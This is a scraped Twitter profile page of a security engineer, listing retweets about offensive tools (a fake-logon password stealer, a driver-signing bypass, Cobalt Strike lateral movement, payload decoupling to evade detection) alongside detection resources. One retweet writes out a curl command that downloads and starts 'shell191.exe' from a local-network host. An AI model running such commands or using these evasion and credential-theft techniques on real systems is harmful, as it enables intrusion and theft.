zw0scura

@zw0scura

System Engineer, Interested in APTs, Malware Analysis, Pentesting, ActiveDirectory, Windows Security, Networks, BlueTeam, RedTeam. Open for Projects in CyperSec

Austria
Vrijeme pridruživanja: svibanj 2011.

Tweetovi

Blokirali ste korisnika/cu @zw0scura

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @zw0scura

  1. proslijedio/la je Tweet
    3. velj

    TeamViewer stored user passwords encrypted, not hashed, and the key is now public

    Poništi
  2. proslijedio/la je Tweet
    1. velj

    is a C# utility to steal a user's password using a fake Windows logon screen. This password will then be validated and saved to disk. Useful in combination with 's execute-assembly command.

    Poništi
  3. proslijedio/la je Tweet
    2. velj

    KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore,

    Poništi
  4. proslijedio/la je Tweet
    1. velj

    Firefox now shows what telemetry data it's collecting about you Just go to about:telemetry

    Poništi
  5. proslijedio/la je Tweet

    Cobalt Strike kit for Lateral Movement

    Poništi
  6. proslijedio/la je Tweet
    1. velj

    Load encrypted PE from XML Attribute. MSBuild is still the best.😅 MSBuild sets Property then calls Execute. Use this example to decouple payloads & prove that all security products have a "Single File Bias". Decouple payloads to subvert detection.

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    1. velj

    Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    29. sij

    1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working.

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    29. sij

    "Using object linking, it is possible to link the RTF files to the remote object which could be the link to the malicious resource hosted on the remote server. This leads the resulting RTF file to behave as a downloader"

    Poništi
  10. proslijedio/la je Tweet
    28. sij

    Be a smart defender! No excuses, don’t need expensive EDR or fancy tools. on monitoring using available tools for intelligent monitoring, linked to ,+ready to use for threat hunting! Sysmon module + TH app —>

    , , i još njih 3
    Poništi
  11. proslijedio/la je Tweet
    28. sij
    Poništi
  12. proslijedio/la je Tweet
    28. sij

    [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    28. sij

    Some Lateral Movement Methods: -Pass the Hash/Relay ((Net-)NTLM) -Pass the Ticket (Silver/Golden) -RDP (Legit creds) -Remote Services (VNC/SSH) -(D)COM (Remote sched tasks, Services, WMI) -Remote Service Vuln (EB) -Admin Shares (PSExec) -Webshell (Chopper) -WinRM (PS Remoting)

    Poništi
  14. proslijedio/la je Tweet
    28. sij
    Poništi
  15. proslijedio/la je Tweet
    27. sij

    Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP.

    Poništi
  16. proslijedio/la je Tweet
    28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    28. sij
    Poništi
  18. proslijedio/la je Tweet
    27. sij

    Given a Pcap File, plot a network diagram displaying hosts in the network, network traffic, highlight important traffic

    Poništi
  19. proslijedio/la je Tweet
    26. sij

    For enumerating subdomains I always use 's Spyse API wrapper. It's so f'in good!

    Poništi
  20. proslijedio/la je Tweet
    26. sij

    Log Sources - ordered by priority - with ratings in different categories - personal and highly subjective assessment - from my most recent slide deck on low hanging fruits in security monitoring

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·